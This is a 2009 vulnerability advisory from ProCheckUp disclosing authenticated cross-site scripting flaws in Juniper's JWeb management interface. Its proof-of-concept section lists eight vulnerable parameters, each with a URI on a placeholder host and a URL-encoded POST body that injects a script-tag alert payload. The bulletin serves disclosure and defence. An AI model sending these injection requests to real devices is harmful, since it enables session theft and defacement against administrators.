New Banner 2

Services

Find out more about ProCheckUp's services including: Penetration Testing, PCI QSA and PCI ASV

Request a Callback

PR09-09 - Juniper JunOS JWeb (Juniper Web Management) authenticated XSS

Vulnerability found:
25 June 2009
Vendor informed:
31 July 2009
Severity level:
Medium
Credits:
Amir Azam of ProCheckUp Ltd (www.procheckup.com)
Description:
There is a Cross-site Scripting vulnerability on Junipers, JUNOS web interface. JwWeb provides a webinterface which allows JUNOS to be controlled by a webinterface.
Procheckup has found by making a malformed authenticated request to the JWeb interface, that vanilla cross site scripting (XSS) attacks are possible.

Consequences

An attacker may be able to cause execution of malicious scripting code in the browser of a user who clicks on a link or visits a malicious webpage. The malicious code would run in the security context of the vulnerable website.

This type of attack can result in non-persistent defacement of the target site, or the redirection of confidential information (i.e.: passwords or session IDs) to unauthorised third parties.

Successfully tested on

Juniper Networks Juniper Web Management (JWeb) Version: 8.5R1.14
Proof of concept:
1) Host parameter within the pinghost program is vulnerable to a XSS attack. Enter "><script>alert(1)</script>

Program URI :- http://target-domain.foo/diagnose?m[]=pinghost

Vulnerable Parameter :- Remote Host
<input id="systest-pinghost-hostname" name="host">

2) Host parameter within the traceroute program is vulnerable to a XSS attack. Enter "><script>alert(1)</script>

Program URI :- http://target-domain.foo/diagnose?m[]=traceroute

Vulnerable Parameter :- Remote Host
<input id="systest-traceroute-hostname" name="host">

3) the probe-limit parameter is vulnerable to XSS

Program URI :- http://target-domain.foo/configuration?m[]=wizards&m[]=rpm

POST
current-page=main&wizard-next=&wizard-mode=&wizard-args=&wizard-ids=&wizard-previous=&probe-owner-list-hidden=false&probe-owner-delete-hidden=true&probe-limit-hidden=false&probe-limit=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&probe-server-tcp-hidden=false&probe-server-tcp=&probe-server-udp-hidden=false&probe-server-udp=&ok-button=++OK++

4) the wizard_ids and pager-new-identifier parameter is vulnerable to a XSS attack

Program URI :- http://target-domain.foo/configuration?m[]=wizards&m[]=firewall-acl&m[]=firewall-filters

POST
current-page=firewall-filters&wizard-next=firewall-filter-term&wizard-mode=new-item&wizard-args=&wizard-ids=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&wizard-previous=firewall-filters&filteraclsummary-hidden=false&wizard-tab-page=firewall-filter-term&wizard-tab-selected=source&pager-new-identifier=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&pager-new-location=end&term-name-search=&num-per-page=25&num-per-page=25&num-per-page=25

5) the os-physical-interface-name parameter is vulnerable to a XSS attack

Pogram URI :- http://target-domain.foo/configuration?m[]=wizards&m[]=cos&m[]=cos-interfaces

POST
current-page=cos-physical-interfaces-edit&wizard-next=cos-logical-interfaces-edit&wizard-mode=add&wizard-args=%7Bcos-physical-interface-name%7D&wizard-ids=%7Bcos-physical-interface-name%7D&wizard-previous=cos-physical-interfaces-edit&cos-physical-interface-name-hidden=false&cos-physical-interface-name=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&cos-physical-interface-scheduler-map-hidden=false&cos-physical-interface-scheduler-map=&cos-logical-interfaces-list-hidden=false&cos-logical-interfaces-delete-hidden=true&cos-physical-interface-scheduler-map=

6) the wizard-args and wizard-ids parameter is vulnerable to a XSS attack

PROGRAM URI :- http://target-domain.foo/configuration?m[]=wizards&m[]=snmp

POST
current-page=main&wizard-next=snmp-community&wizard-mode=edit&wizard-args=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&wizard-ids=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&wizard-previous=main&contact-hidden=false&contact=&description-hidden=false&description=&engineid-hidden=false&engineid=&location-hidden=false&location=&override-hidden=false&override=&communities-hidden=false&snmp-community-delete-hidden=true&trapgroups-hidden=false&snmp-trap-group-delete-hidden=true&health-monitor-enable-original=off&health-monitor-enable-hidden=false&interval-hidden=false&rising-threshold-non-jseries-hidden=false&falling-threshold-non-jseries-hidden=false&community-checked%5B%5D=off&health-monitor-enable=off&interval=&rising-threshold-non-jseries=&falling-threshold-non-jseries=

7) the username and fullname is vulnerable to a XSS attack

PROGRAM URI :- http://target-domain.foo/configuration?m[]=wizards&m[]=users

POST
current-page=users&wizard-next=&wizard-mode=&wizard-args=&wizard-ids=&wizard-previous=&username-hidden=false&username=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&fullname-hidden=false&fullname=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&class-hidden=false&class=unauthorized&loginpassword-hidden=false&loginpassword=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&loginpassword-verify=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&ok-button=++OK++&class=unauthorized


8) the certname and certbody parameter is vulnerable to a XSS attack

PROGRAM URI :- http://target-domain.foo/configuration?m[]=wizards&m[]=https

POST
current-page=local-cert&wizard-next=&wizard-mode=&wizard-args=&wizard-ids=&wizard-previous=&certname-hidden=false&certname=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&certbody-hidden=false&certbody=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&ok-button=++OK++

Note: the previous examples were tested on IE7 and FF2.
References:
ProCheckUp Vulnerabilities
http://www.procheckup.com/vulnerability_manager
Legal:
Copyright 2009 Procheckup Ltd. All rights reserved.

Permission is granted for copying and circulating this Bulletin to the Internet community for the purpose of alerting them to problems, if and only if, the Bulletin is not edited or changed in any way, is attributed to Procheckup, and provided such reproduction and/or distribution is performed for non-commercial purposes.

Any other use of this information is prohibited. Procheckup is not liable for any misuse of this information by any third party.
Back to Vulnerabilities List